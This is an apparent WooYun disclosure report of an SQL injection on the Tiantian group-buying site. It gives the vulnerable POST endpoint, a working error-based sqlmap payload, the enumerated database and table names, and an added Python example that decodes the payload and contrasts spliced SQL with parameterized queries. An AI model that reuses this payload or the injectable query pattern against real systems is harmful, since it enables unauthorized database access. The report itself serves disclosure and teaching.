Vulnerability summary    Followers: 24
Defect ID: wooyun-2014-060774
Title: POST injection on the Tiantian group-buying main site
Vendor: tiantian.com
Author: 疯子
Submitted: 2014-05-15 10:55
Fix time: 2014-06-29 10:56
Public disclosure: 2014-06-29 10:56
Vulnerability type: SQL injection
Severity: High
Self-assessed rank: 20
Status: confirmed by vendor
Source: http://www.wooyun.org; for questions or help contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2014-05-15: Details sent to the vendor, awaiting vendor action
2014-05-15: Vendor confirmed; details visible to the vendor only
2014-05-25: Details opened to core white hats and domain experts
2014-06-04: Details opened to regular white hats
2014-06-14: Details opened to intern white hats
2014-06-29: Details opened to the public
Summary:
POST injection on the Tiantian group-buying main site
Details:
Testing found a well-hidden injection point on the main site. I heard Tiantian hands out gifts, so here I am, you know what I mean!
http://www.tiantian.com/products/search/index?Ajax_CallBack=true
POST body: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
Proof of vulnerability:
sqlmap identified the following injection points with a total of 412 HTTP(s) requests:
---
Place: POST
Parameter: Ajax_CallBackArgument0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) AND ('KRzD'='KRzD&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397
---
web server operating system: Windows Vista
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] CPS_Log
[*] CPS_Union
[*] DBAdmin
[*] master
[*] model
[*] msdb
[*] newsite
[*] NewSite_Action
[*] NewSite_Archive
[*] NewSite_Biz
[*] NewSite_His
[*] NewSite_Wireless
[*] SiteBase
[*] tempdb
[*] tuan_sub
[*] WMSys_SKU_sub
[*] WMSys_sub
Database: NewSite_Action
[78 tables]
+----------------------------------------+
| Action_Activity |
| Action_ColifNvShen |
| Action_Coupons_RecevieRecord |
| Action_DonateOrder |
| Action_FLRecode |
| Action_InviteCountRecord |
| Action_InviteRecord |
| Action_InviteRecordActivity |
| Action_InviteRecordUsed |
| Action_OrderBuyList |
| Action_OrderInfoList |
| Action_OrderMessage |
| Action_OrderProduct |
| Action_OrderStepPrice |
| Action_RechargeCard |
| Action_SignCountRecord |
| Action_SignLotteryInfo |
| Action_SignLotteryRecord |
| Action_SignRecord |
| Action_SignUpdateSeriesCountLog |
| Action_Statistics_User |
| Action_UsedRecord |
| CMS_NewsChannel |
| CMS_NewsInfo |
| CMS_News_Extend |
| Coupon_ReturnCoupon_Record |
| FanLi_Commision |
| FanLi_OrderInfo |
| FanLi_SiteInfo |
| FanLi_SiteTypeInfo |
| FanLi_TypeInfo |
| Favourable_ActivityList |
| Favourable_ActivityType |
| Favourable_Activity_Extend |
| MSpeer_conflictdetectionconfigrequest |
| MSpeer_conflictdetectionconfigresponse |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| MSpeer_request |
| MSpeer_response |
| MSpeer_topologyrequest |
| MSpeer_topologyresponse |
| MSpub_identity_range |
| Order_ActivityList |
| Promotion_Active |
| Promotion_ActiveRule |
| Promotion_InstanceData |
| Promotion_Rule |
| Promotion_RuleItem |
| Promotion_RuleItem_Relation |
| Promotion_RuleObject |
| Promotion_RuleValue |
| Rule_GiftRecond |
| Rule_RuleChildType |
| Rule_RuleCondition |
| Rule_RuleMain |
| Rule_RuleMainType |
| Rule_RuleReward |
| SKU_Product_Recommend |
| UserInfo_Extend |
| Vote_ActionInfo |
| Vote_Base_ProductImgage |
| Vote_Base_ProductInfo |
| Vote_Count |
| Vote_Log |
| Vote_Result |
| syncobj_0x3237343046304441 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| vPromotion_RuleItem_Relation |
+----------------------------------------+
Fix recommendation:
Filter the input: validate Ajax_CallBackArgument0 against the expected product-code format, and pass it to SQL Server as a bound parameter instead of concatenating it into the query text.
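To make the proof and the fix above concrete, here is an added example (written for this page, not code from the report or from Tiantian). It decodes the CHAR() runs in the reported sqlmap payload to expose the marker strings, pulls the leaked value out of a constructed SQL Server conversion error of the kind that payload provokes, and then contrasts the vulnerable string-splicing pattern with a parameterized query on an in-memory SQLite table. The `products` table, its rows and the `WHERE (code = '...')` query shape are assumptions inferred from the payload's leading `')` and trailing `('KRzD'='KRzD`, not the site's real schema.

```python
import re
import sqlite3
from typing import Optional

# The error-based payload sqlmap reported for Ajax_CallBackArgument0
# (copied from the proof above).
REPORTED_PAYLOAD = (
    "j002355') AND 6600=CONVERT(INT,(SELECT CHAR(113)+CHAR(103)+CHAR(104)"
    "+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (6600=6600) THEN CHAR(49) ELSE "
    "CHAR(48) END))+CHAR(113)+CHAR(110)+CHAR(99)+CHAR(117)+CHAR(113))) "
    "AND ('KRzD'='KRzD"
)

# Constructed SQL Server error text (error 245) of the kind this payload
# triggers: CONVERT(INT, 'qghjq1qncuq') can never succeed, and the failing
# string is echoed back inside the error message. That echo is the channel.
CONSTRUCTED_ERROR = (
    "Conversion failed when converting the nvarchar value 'qghjq1qncuq' "
    "to data type int."
)

_CHAR_RUN = re.compile(r"(?:CHAR\(\d+\)\+?)+")


def decode_char_runs(payload: str) -> list:
    """Turn every CHAR(n)+CHAR(n)... run in a payload into plain text.

    sqlmap spells its markers this way so the payload needs no extra quotes;
    decoding them shows the prefix, the 1/0 oracle bits and the suffix.
    """
    runs = []
    for match in _CHAR_RUN.finditer(payload):
        codes = re.findall(r"CHAR\((\d+)\)", match.group(0))
        runs.append("".join(chr(int(c)) for c in codes))
    return runs


def extract_leaked_value(error_text: str, prefix: str, suffix: str) -> Optional[str]:
    """Recover the text sqlmap wrapped between its markers from a DBMS error."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text, re.S)
    return m.group(1) if m else None


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a products table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, code TEXT)")
    conn.executemany(
        "INSERT INTO products (code) VALUES (?)",
        [("j002355",), ("j002356",), ("j002357",)],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, arg0: str) -> list:
    """Vulnerable pattern: the request argument is spliced into the SQL text.

    A value such as  j002355') OR ('1'='1  rebalances the parentheses and
    turns the lookup into a query that matches every row.
    """
    sql = f"SELECT id, code FROM products WHERE (code = '{arg0}')"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, arg0: str) -> list:
    """The fix: bind the value, so the same input is only ever a string."""
    return conn.execute(
        "SELECT id, code FROM products WHERE (code = ?)", (arg0,)
    ).fetchall()


if __name__ == "__main__":
    runs = decode_char_runs(REPORTED_PAYLOAD)
    print("marker runs:", runs)
    print("leaked:", extract_leaked_value(CONSTRUCTED_ERROR, runs[0], runs[-1]))
    conn = demo_db()
    hostile = "j002355') OR ('1'='1"
    print("unsafe rows:", lookup_unsafe(conn, hostile))
    print("parameterized rows:", lookup_parameterized(conn, hostile))
```

The first two runs the decoder returns are the marker prefix and the CASE result; the `6600=6600` test is just sqlmap confirming the channel works. Once it does, sqlmap swaps the CASE expression for a real subquery (database names, table names, and so on), and each response's conversion error carries the next chunk of data between the same two markers, which is how the database and table listings in the proof were obtained. The SQLite part does not reproduce the CONVERT() error (that is SQL Server specific); it only shows why binding the value, rather than filtering characters, is the durable fix: the hostile input returns every row through the spliced query and nothing through the parameterized one.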
Copyright notice: please credit the source when reposting: 疯子@乌云 (WooYun)
Vendor response
Vendor reply:
Severity: High
Vulnerability rank: 20
Confirmed: 2014-05-15 12:49
Vendor comment:
Latest status:
None yet